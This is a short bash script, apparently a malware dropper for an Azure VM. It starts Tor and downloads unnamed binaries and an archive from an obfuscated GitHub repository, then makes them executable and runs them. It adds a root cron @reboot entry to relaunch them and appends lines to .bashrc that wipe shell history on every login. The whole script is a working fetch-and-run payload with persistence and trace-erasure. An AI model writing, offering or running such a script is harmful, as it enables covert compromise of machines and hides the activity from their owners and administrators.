#!/bin/bash
sudo systemctl start tor
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/cpotr

wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/cpo2tr

chmod ugo+x cpo2tr
chmod ugo+x cpotr
wget https://github.com/j2d23enr2os32omedaro/jfksdhfvdsiouwrbn32980vxcnbmdfsajkfh2398/raw/main/SRB11.tar.gz

tar -xf SRB11.tar.gz
rm -r SRB11.tar.gz

sudo systemctl enable cron

sudo crontab -l | { cat; echo "@reboot /home/azureuser/cpo2tr & /home/azureuser/crp2"; } | crontab

echo ". cat /dev/null > ~/.bash_history" >> ~/.bashrc
echo ". history -cw" >> ~/.bashrc
cat /dev/null > ~/.bash_history
history -cw

./cpo2tr
